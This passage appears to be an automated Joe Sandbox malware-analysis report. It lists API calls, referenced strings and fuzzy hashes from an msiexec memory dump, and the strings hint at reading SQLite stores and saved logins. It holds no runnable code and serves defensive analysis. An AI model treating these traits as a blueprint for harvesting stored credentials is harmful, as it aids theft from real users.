                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                          • String ID: r!A
                                                                                          • API String ID: 2791114272-628097481
                                                                                          • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                          • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                          • String ID: BIN
                                                                                          • API String ID: 1668488027-1015027815
                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                          • String ID: AE$.cfg$General$EA
                                                                                          • API String ID: 776488737-1622828088
                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                          • String ID: sysdatetimepick32
                                                                                          • API String ID: 1028950076-4169760276
                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID: -journal$-wal
                                                                                          • API String ID: 438689982-2894717839
                                                                                          • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                          • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3975816621-0
                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                          APIs
                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                          • API String ID: 1214746602-2708368587
                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                          APIs
                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                          • memset.MSVCRT ref: 00405E33
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                          • String ID:
                                                                                          • API String ID: 2313361498-0
                                                                                          • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                          • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                          • String ID:
                                                                                          • API String ID: 2047574939-0
                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                          APIs
                                                                                          • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                          • GetTickCount.KERNEL32 ref: 0041887D
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                          • String ID:
                                                                                          • API String ID: 4218492932-0
                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                          APIs
                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$memset
                                                                                          • String ID: gj
                                                                                          • API String ID: 438689982-4203073231
                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                          • API String ID: 3510742995-2446657581
                                                                                          • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                          • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                          • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                          • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                          • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                          • memset.MSVCRT ref: 00405ABB
                                                                                          • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                          • SetFocus.USER32(?), ref: 00405B76
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                          • String ID:
                                                                                          • API String ID: 4281309102-0
                                                                                          • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                          • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                          • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                          • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _snwprintfwcscat
                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                          • API String ID: 384018552-4153097237
                                                                                          • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                          • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                          • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                          • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                          • String ID: 0$6
                                                                                          • API String ID: 2029023288-3849865405
                                                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                          APIs
                                                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                          • memset.MSVCRT ref: 00405455
                                                                                          • memset.MSVCRT ref: 0040546C
                                                                                          • memset.MSVCRT ref: 00405483
                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$memcpy$ErrorLast
                                                                                          • String ID: 6$\
                                                                                          • API String ID: 404372293-1284684873
                                                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesErrorFileLastSleep$free
                                                                                          • String ID:
                                                                                          • API String ID: 1470729244-0
                                                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                          APIs
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                                                          • wcscpy.MSVCRT ref: 0040A107
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1331804452-0
                                                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                          APIs
                                                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                          • String ID: advapi32.dll
                                                                                          • API String ID: 2012295524-4050573280
                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                          APIs
                                                                                          Strings
                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                          • <%s>, xrefs: 004100A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$_snwprintf
                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                          • API String ID: 3473751417-2880344631
                                                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                          • String ID: %2.2X
                                                                                          • API String ID: 2521778956-791839006
                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
